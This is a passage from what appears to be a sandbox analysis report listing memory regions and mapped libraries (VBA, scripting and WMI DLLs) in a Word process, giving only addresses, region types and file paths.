region_type = private name = "private_0x000000000fb60000" filename = "" Region: id = 514 start_va = 0xff40000 end_va = 0x10310fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ff40000" filename = "" Region: id = 515 start_va = 0xce70000 end_va = 0xd05ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce70000" filename = "" Region: id = 516 start_va = 0xfb60000 end_va = 0xfd51fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb60000" filename = "" Region: id = 517 start_va = 0xce70000 end_va = 0xd139fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce70000" filename = "" Region: id = 518 start_va = 0xfb60000 end_va = 0xfe27fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb60000" filename = "" Region: id = 519 start_va = 0xfe30000 end_va = 0xff9cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fe30000" filename = "" Region: id = 520 start_va = 0xce70000 end_va = 0xcfdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce70000" filename = "" Region: id = 521 start_va = 0xfb60000 end_va = 0xff33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb60000" filename = "" Region: id = 522 start_va = 0xff40000 end_va = 0x10308fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ff40000" filename = "" Region: id = 523 start_va = 0x10310000 end_va = 0x104f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010310000" filename = "" Region: id = 524 start_va = 0xfb60000 end_va = 0xfd49fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb60000" filename = "" Region: id = 525 start_va = 0xfd50000 end_va = 0x10013fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd50000" filename = "" Region: id = 526 start_va = 0x10020000 end_va = 0x103f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010020000" filename = "" Region: id = 527 start_va = 0x10400000 end_va = 0x107fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000010400000" filename = "" Region: id = 528 start_va = 0x2480000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "~wrf{d3713bf3-7978-4c9d-a79e-9b1376910c39}.tmp" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Word\\~WRF{D3713BF3-7978-4C9D-A79E-9B1376910C39}.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\content.word\\~wrf{d3713bf3-7978-4c9d-a79e-9b1376910c39}.tmp") Region: id = 529 start_va = 0x693e0000 end_va = 0x6965efff monitored = 1 entry_point = 0x6947bfb8 region_type = mapped_file name = "vbe7.dll" filename = "\\PROGRA~2\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\common~1\\micros~1\\vba\\vba7.1\\vbe7.dll") Region: id = 530 start_va = 0x69320000 end_va = 0x693defff monitored = 0 entry_point = 0x69331dfc region_type = mapped_file name = "msvcr100.dll" filename = "\\Windows\\SysWOW64\\msvcr100.dll" (normalized: "c:\\windows\\syswow64\\msvcr100.dll") Region: id = 531 start_va = 0xce70000 end_va = 0xd01ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce70000" filename = "" Region: id = 532 start_va = 0x7fe90000 end_va = 0x7fe9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe90000" filename = "" Region: id = 533 start_va = 0x2400000 end_va = 0x2403fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 534 start_va = 0x2410000 end_va = 0x2454fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db") Region: id = 535 start_va = 0x8240000 end_va = 0x8243fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 536 start_va = 0xb600000 end_va = 0xb68dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 537 start_va = 0x8250000 end_va = 0x8260fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 538 start_va = 0x8270000 end_va = 0x8271fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008270000" filename = "" Region: id = 539 start_va = 0x8280000 end_va = 0x8281fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008280000" filename = "" Region: id = 540 start_va = 0x8290000 end_va = 0x8290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008290000" filename = "" Region: id = 541 start_va = 0xce70000 end_va = 0xcf56fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibri.ttf" filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf") Region: id = 542 start_va = 0xd010000 end_va = 0xd01ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d010000" filename = "" Region: id = 543 start_va = 0xd020000 end_va = 0xd0fcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibrib.ttf" filename = "\\Windows\\Fonts\\calibrib.ttf" (normalized: "c:\\windows\\fonts\\calibrib.ttf") Region: id = 544 start_va = 0x10800000 end_va = 0x109fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010800000" filename = "" Region: id = 545 start_va = 0x69200000 end_va = 0x6931bfff monitored = 0 entry_point = 0x692674f0 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\SysWOW64\\UIAutomationCore.dll" (normalized: "c:\\windows\\syswow64\\uiautomationcore.dll") Region: id = 546 start_va = 0x691e0000 end_va = 0x691f8fff monitored = 0 entry_point = 0x691e47e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 547 start_va = 0x8290000 end_va = 0x8290fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008290000" filename = "" Region: id = 548 start_va = 0xfb60000 end_va = 0xfc5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb60000" filename = "" Region: id = 549 start_va = 0x10a00000 end_va = 0x10dbcfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000010a00000" filename = "" Region: id = 550 start_va = 0x10dc0000 end_va = 0x1117cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000010dc0000" filename = "" Region: id = 551 start_va = 0x82a0000 end_va = 0x82affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082a0000" filename = "" Region: id = 552 start_va = 0xb690000 end_va = 0xb69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b690000" filename = "" Region: id = 553 start_va = 0xb6a0000 end_va = 0xb6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b6a0000" filename = "" Region: id = 554 start_va = 0xb6a0000 end_va = 0xb6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b6a0000" filename = "" Region: id = 555 start_va = 0xcf60000 end_va = 0xd005fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf60000" filename = "" Region: id = 556 start_va = 0xb6a0000 end_va = 0xb6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b6a0000" filename = "" Region: id = 557 start_va = 0xb6b0000 end_va = 0xb6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b6b0000" filename = "" Region: id = 558 start_va = 0xb6c0000 end_va = 0xb6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b6c0000" filename = "" Region: id = 559 start_va = 0xb6c0000 end_va = 0xb6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b6c0000" filename = "" Region: id = 560 start_va = 0xb6d0000 end_va = 0xb6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b6d0000" filename = "" Region: id = 561 start_va = 0xb6e0000 end_va = 0xb6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b6e0000" filename = "" Region: id = 562 start_va = 0x76b50000 end_va = 0x76b54fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 563 start_va = 0xb6c0000 end_va = 0xb6d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normidna.nls" filename = "\\Windows\\System32\\normidna.nls" (normalized: "c:\\windows\\system32\\normidna.nls") Region: id = 564 start_va = 0x691d0000 end_va = 0x691dafff monitored = 0 entry_point = 0x691d2150 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\SysWOW64\\linkinfo.dll" (normalized: "c:\\windows\\syswow64\\linkinfo.dll") Region: id = 565 start_va = 0x69100000 end_va = 0x691c8fff monitored = 0 entry_point = 0x69113180 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\SysWOW64\\ntshrui.dll" (normalized: "c:\\windows\\syswow64\\ntshrui.dll") Region: id = 566 start_va = 0x690e0000 end_va = 0x690fbfff monitored = 0 entry_point = 0x690e4720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 567 start_va = 0xb6e0000 end_va = 0xb6e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b6e0000" filename = "" Region: id = 568 start_va = 0xb6e0000 end_va = 0xb6e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b6e0000" filename = "" Region: id = 569 start_va = 0x690d0000 end_va = 0x690defff monitored = 0 entry_point = 0x690d3f00 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 570 start_va = 0xb6f0000 end_va = 0xb6f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b6f0000" filename = "" Region: id = 571 start_va = 0xb6f0000 end_va = 0xb6f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b6f0000" filename = "" Region: id = 572 start_va = 0x11180000 end_va = 0x11280fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011180000" filename = "" Region: id = 573 start_va = 0x11180000 end_va = 0x11280fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011180000" filename = "" Region: id = 574 start_va = 0x11180000 end_va = 0x11280fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011180000" filename = "" Region: id = 575 start_va = 0xb6f0000 end_va = 0xb6f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b6f0000" filename = "" Region: id = 576 start_va = 0x11180000 end_va = 0x11280fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011180000" filename = "" Region: id = 577 start_va = 0x11180000 end_va = 0x11280fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011180000" filename = "" Region: id = 578 start_va = 0x70a00000 end_va = 0x70a40fff monitored = 0 entry_point = 0x70a07fe0 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\SysWOW64\\DataExchange.dll" (normalized: "c:\\windows\\syswow64\\dataexchange.dll") Region: id = 579 start_va = 0xb6f0000 end_va = 0xb6fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b6f0000" filename = "" Region: id = 580 start_va = 0x69040000 end_va = 0x690c0fff monitored = 0 entry_point = 0x6905b260 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 581 start_va = 0xfc60000 end_va = 0xfd40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msword.olb" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\MSWORD.OLB" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\msword.olb") Region: id = 582 start_va = 0x11180000 end_va = 0x113a5fff monitored = 1 entry_point = 0x1118e058 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 583 start_va = 0xb6f0000 end_va = 0xb6f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b6f0000" filename = "" Region: id = 584 start_va = 0x69030000 end_va = 0x6903cfff monitored = 0 entry_point = 0x69033520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 585 start_va = 0x68fc0000 end_va = 0x69026fff monitored = 0 entry_point = 0x68fdb610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 586 start_va = 0x68d80000 end_va = 0x68fb0fff monitored = 1 entry_point = 0x68d8e058 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 587 start_va = 0xb700000 end_va = 0xb701fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b700000" filename = "" Region: id = 588 start_va = 0x74c00000 end_va = 0x74c41fff monitored = 0 entry_point = 0x74c16f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 589 start_va = 0x764c0000 end_va = 0x764cdfff monitored = 0 entry_point = 0x764c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 590 start_va = 0x73f90000 end_va = 0x74107fff monitored = 0 entry_point = 0x73fe8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 591 start_va = 0xb710000 end_va = 0xb71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b710000" filename = "" Region: id = 592 start_va = 0x68d60000 end_va = 0x68d70fff monitored = 0 entry_point = 0x68d68fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 593 start_va = 0xd100000 end_va = 0xd125fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vbe7intl.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\1033\\vbe7intl.dll") Region: id = 594 start_va = 0x68ca0000 end_va = 0x68d5efff monitored = 0 entry_point = 0x68cd1e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 595 start_va = 0xb720000 end_va = 0xb72afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normnfd.nls" filename = "\\Windows\\System32\\normnfd.nls" (normalized: "c:\\windows\\system32\\normnfd.nls") Region: id = 596 start_va = 0xb730000 end_va = 0xb73ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b730000" filename = "" Region: id = 597 start_va = 0xb730000 end_va = 0xb730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b730000" filename = "" Region: id = 598 start_va = 0xd130000 end_va = 0xd14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d130000" filename = "" Region: id = 599 start_va = 0xdd80000 end_va = 0xdd82fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000dd80000" filename = "" Region: id = 600 start_va = 0x11180000 end_va = 0x11183fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011180000" filename = "" Region: id = 601 start_va = 0x11190000 end_va = 0x11190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011190000" filename = "" Region: id = 602 start_va = 0x111a0000 end_va = 0x111a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000111a0000" filename = "" Region: id = 603 start_va = 0x111b0000 end_va = 0x111b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000111b0000" filename = "" Region: id = 604 start_va = 0x111c0000 end_va = 0x111dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000111c0000" filename = "" Region: id = 605 start_va = 0x111e0000 end_va = 0x111e2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000111e0000" filename = "" Region: id = 606 start_va = 0x111f0000 end_va = 0x11204fff monitored = 1 entry_point = 0x1128bfb8 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 607 start_va = 0x11210000 end_va = 0x11214fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\SysWOW64\\stdole2.tlb" (normalized: "c:\\windows\\syswow64\\stdole2.tlb") Region: id = 608 start_va = 0x11220000 end_va = 0x1129bfff monitored = 0 entry_point = 0x11221000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll") Region: id = 609 start_va = 0x112a0000 end_va = 0x112a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112a0000" filename = "" Region: id = 610 start_va = 0x112b0000 end_va = 0x112b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112b0000" filename = "" Region: id = 611 start_va = 0x112c0000 end_va = 0x112c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112c0000" filename = "" Region: id = 612 start_va = 0x112d0000 end_va = 0x112d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112d0000" filename = "" Region: id = 613 start_va = 0x112e0000 end_va = 0x112fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112e0000" filename = "" Region: id = 614 start_va = 0x11300000 end_va = 0x11302fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011300000" filename = "" Region: id = 615 start_va = 0x11310000 end_va = 0x11315fff monitored = 1 entry_point = 0x113abfb8 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 616 start_va = 0x11320000 end_va = 0x11323fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011320000" filename = "" Region: id = 617 start_va = 0x11320000 end_va = 0x1135ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011320000" filename = "" Region: id = 618 start_va = 0x11360000 end_va = 0x1145ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011360000" filename = "" Region: id = 619 start_va = 0x11460000 end_va = 0x11463fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011460000" filename = "" Region: id = 620 start_va = 0x11470000 end_va = 0x11473fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011470000" filename = "" Region: id = 621 start_va = 0x11480000 end_va = 0x114bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011480000" filename = "" Region: id = 622 start_va = 0x114c0000 end_va = 0x115bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000114c0000" filename = "" Region: id = 623 start_va = 0x115c0000 end_va = 0x11889fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000115c0000" filename = "" Region: id = 624 start_va = 0x11890000 end_va = 0x119f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011890000" filename = "" Region: id = 625 start_va = 0x11a00000 end_va = 0x11b6afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011a00000" filename = "" Region: id = 626 start_va = 0x11890000 end_va = 0x119f8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011890000" filename = "" Region: id = 627 start_va = 0x11a00000 end_va = 0x11b67fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011a00000" filename = "" Region: id = 628 start_va = 0x11890000 end_va = 0x119f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011890000" filename = "" Region: id = 629 start_va = 0x68b50000 end_va = 0x68c9dfff monitored = 0 entry_point = 0x68b93000 region_type = mapped_file name = "comsvcs.dll" filename = "\\Windows\\SysWOW64\\comsvcs.dll" (normalized: "c:\\windows\\syswow64\\comsvcs.dll") Region: id = 630 start_va = 0x71200000 end_va = 0x71212fff monitored = 0 entry_point = 0x71209950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 631 start_va = 0x70230000 end_va = 0x7025efff monitored = 0 entry_point = 0x702495e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 632 start_va = 0x68b20000 end_va = 0x68b42fff monitored = 0 entry_point = 0x68b27b50 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 633 start_va = 0x68b00000 end_va = 0x68b15fff monitored = 0 entry_point = 0x68b021d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 634 start_va = 0x68ad0000 end_va = 0x68afafff monitored = 0 entry_point = 0x68ad9a70 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 635 start_va = 0x115c0000 end_va = 0x115ccfff monitored = 0 entry_point = 0x115c7b50 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 636 start_va = 0x115c0000 end_va = 0x116b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000115c0000" filename = "" Region: id = 637 start_va = 0x116c0000 end_va = 0x117b2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000116c0000" filename = "" Region: id = 638 start_va = 0x68730000 end_va = 0x68ac0fff monitored = 0 entry_point = 0x689e35b0 region_type = mapped_file name = "d3dcompiler_47.dll" filename = "\\Windows\\SysWOW64\\D3DCompiler_47.dll" (normalized: "c:\\windows\\syswow64\\d3dcompiler_47.dll") Region: id = 639 start_va = 0x115c0000 end_va = 0x116bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000115c0000" filename = "" Region: id = 640 start_va = 0x117c0000 end_va = 0x117cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000117c0000" filename = "" Region: id = 641 start_va = 0x117d0000 end_va = 0x117dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000117d0000" filename = "" Region: id = 642 start_va = 0x117e0000 end_va = 0x117effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000117e0000" filename = "" Region: id = 643 start_va = 0x7fe80000 end_va = 0x7fe8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe80000" filename = "" Region: id = 644 start_va = 0x117f0000 end_va = 0x117fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000117f0000" filename = "" Region: id = 645 start_va = 0x11a00000 end_va = 0x11afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011a00000" filename = "" Region: id = 646 start_va = 0x11800000 end_va = 0x1180ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011800000" filename = "" Region: id = 647 start_va = 0x11810000 end_va = 0x1181ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011810000" filename = "" Region: id = 648 start_va = 0x11820000 end_va = 0x1182ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011820000" filename = "" Region: id = 649 start_va = 0x11830000 end_va = 0x1183ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011830000" filename = "" Region: id = 650 start_va = 0x11b00000 end_va = 0x11ba5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b00000" filename = "" Region: id = 651 start_va = 0x11840000 end_va = 0x1184ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011840000" filename = "" Region: id = 652 start_va = 0x11850000 end_va = 0x1185ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011850000" filename = "" Region: id = 653 start_va = 0x11860000 end_va = 0x1186ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011860000" filename = "" Region: id = 654 start_va = 0x11870000 end_va = 0x1187ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011870000" filename = "" Region: id = 655 start_va = 0x11830000 end_va = 0x1183ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011830000" filename = "" Region: id = 656 start_va = 0x11840000 end_va = 0x1184ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011840000" filename = "" Region: id = 657 start_va = 0x11850000 end_va = 0x1185ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011850000" filename = "" Region: id = 658 start_va = 0x11860000 end_va = 0x1186ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011860000" filename = "" Region: id = 659 start_va = 0x11870000 end_va = 0x1187ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011870000" filename = "" Region: id = 660 start_va = 0x11880000 end_va = 0x1188ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011880000" filename = "" Region: id = 661 start_va = 0x11880000 end_va = 0x1188ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011880000" filename = "" Region: id = 662 start_va = 0x11bb0000 end_va = 0x11bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011bb0000" filename = "" Region: id = 663 start_va = 0x11bc0000 end_va = 0x11bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011bc0000" filename = "" Region: id = 664 start_va = 0x11bd0000 end_va = 0x11bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011bd0000" filename = "" Region: id = 665 start_va = 0x11be0000 end_va = 0x11beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011be0000" filename = "" Region: id = 666 start_va = 0x11bf0000 end_va = 0x11bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011bf0000" filename = "" Region: id = 667 start_va = 0x11c00000 end_va = 0x11c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c00000" filename = "" Region: id = 668 start_va = 0x11c10000 end_va = 0x11c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c10000" filename = "" Region: id = 669 start_va = 0x11c20000 end_va = 0x11c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c20000" filename = "" Region: id = 670 start_va = 0x11880000 end_va = 0x1188ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011880000" filename = "" Region: id = 671 start_va = 0x11bb0000 end_va = 0x11bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011bb0000" filename = "" Region: id = 672 start_va = 0x11bc0000 end_va = 0x11bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011bc0000" filename = "" 